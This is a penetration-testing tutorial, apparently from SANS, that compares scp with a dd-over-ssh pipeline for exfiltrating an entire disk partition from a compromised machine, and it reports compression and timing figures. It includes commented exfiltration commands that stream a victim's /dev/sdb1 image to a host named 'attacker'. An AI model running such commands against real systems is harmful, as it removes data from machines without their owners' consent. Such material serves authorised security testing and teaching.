SANS Penetration Testing

Introduction

Sometimes, when looking through files for useful information after exploiting a box, you might run into a small file system or particularly interesting disk partition. Due to time constraints and the need for specialized analysis tools, it might be helpful, or even necessary, to exfiltrate the entire partition. In these cases, we can combine the powers of dd as a data-duplication tool and ssh as a means of securely and reliably transferring data, letting us efficiently bring the remote partition back to our local attack machine.
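As a baseline, consider pulling the directory contents with scp. The exact original command isn't preserved here, so the remote form below is a hedged sketch (user, host, and destination path are hypothetical); the runnable portion stands in for the transfer with a local copy so the file-by-file mechanism can be demonstrated without a remote host:

```shell
# Hypothetical remote form: -r recurses into /data, -C enables
# compression of the ssh transport on the wire.
#   scp -rC user@victim:/data /tmp/loot/
#
# Local stand-in for the file-by-file copy, runnable anywhere:
set -e
src=$(mktemp -d); dst=$(mktemp -d)
mkdir "$src/sub"
echo "credentials" > "$src/creds.txt"
echo "notes" > "$src/sub/notes.txt"
cp -r "$src/." "$dst/"        # stands in for the scp transfer
diff -r "$src" "$dst" && echo "file-by-file copy complete"
```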

This provides a file-by-file copy mechanism that brings copies of all files in the /data directory back to the pentester's system. Measuring performance in terms of time, bandwidth used, and data pulled across multiple executions produced the metrics discussed below.

A quick comparison shows that scp's compression was completely ineffective on our test dataset (~685MB of random data split into 653 files). This is expected: random data contains essentially no redundancy for a compressor to exploit. In fact, compression actually bloated the amount of data transmitted on the wire; the data sent was approximately 105% of the size of the data on disk.

Maybe dd + ssh will provide a superior alternative?

By using the dd command, we can perform a byte-by-byte copy of the underlying partition that is mounted at /data. Copying data this way brings back the entire partition, slack space included, so disk forensics tools can even be used to recover data that has been deleted from the victim machine.
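The command might look like the following sketch. The device, user, host, destination path, and the use of gzip -1 for compression are all assumptions here, chosen to match the parameters the surrounding text describes; the runnable portion replaces the ssh hop with a redirect against a scratch "partition" so the pipeline can be exercised without a remote host:

```shell
# Hypothetical remote form: stream a compressed image of the
# partition backing /data to the attack machine over ssh.
#   dd if=/dev/sdb1 bs=65536 conv=noerror,sync \
#     | gzip -1 \
#     | ssh user@attacker 'dd of=/tmp/sdb1.img.gz bs=65536'
#
# Local stand-in: same dd/gzip pipeline against a scratch file,
# with the ssh hop replaced by a plain redirect.
set -e
work=$(mktemp -d)
dd if=/dev/urandom of="$work/partition.bin" bs=65536 count=16 2>/dev/null
dd if="$work/partition.bin" bs=65536 conv=noerror,sync 2>/dev/null \
  | gzip -1 > "$work/partition.img.gz"
gunzip -c "$work/partition.img.gz" | cmp - "$work/partition.bin" \
  && echo "image matches source partition"
```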

In the above dd command, the input file argument (if=) specifies the source for duplication (in this case /dev/sdb1, the underlying partition mounted at /data). The block size argument (bs=) specifies how many bytes dd reads and writes at a time. Because the output of this dd command is piped (via the | operator) into ssh to stream data to the attack station, we specified 65536 bytes; this matches the default total pipe capacity on Linux (note that PIPE_BUF, the POSIX atomic-write limit for a pipe, is a different and typically much smaller value, e.g. 4096 bytes on Linux, and both figures vary across systems). The conversion (conv=) flags noerror and sync are commonly used when making backup images: they allow dd to continue imaging when read errors occur and to pad unreadable blocks in the output with null bytes, preserving the original layout and offsets of the image as much as possible. For performance statistics, the above command was run multiple times and yielded the metrics discussed below.
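Since these pipe-related figures vary by platform, it's easy to check the POSIX PIPE_BUF value for a given path locally (a quick sketch; note this queries the atomic-write limit, not the kernel's total pipe capacity):

```shell
# PIPE_BUF is the POSIX atomic-write limit for a pipe, not the
# total kernel pipe capacity; on Linux this typically prints 4096,
# while the default pipe capacity is 65536 bytes.
getconf PIPE_BUF /tmp
```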

So with dd + ssh running on the same dataset of completely random data, compression functioned as intended, and the data transmitted was approximately 67% of the size of the data on disk; most of that gain likely comes from the unused space in the partition image, which is largely null bytes and compresses extremely well. Additionally, execution time was only 0.083 seconds slower, despite the byte-by-byte disk image being 56.6% larger than the file data alone.

Conclusion

In additional testing, the dd + ssh option continued to perform well. Even against standalone files, dd + ssh performance was nearly identical to or outperformed the scp alternative. While this won't hold true in every scenario, and there are definitely cases where scp would be the better option, dd + ssh provides a robust solution for controlled, compressed, and encrypted mass data transfer.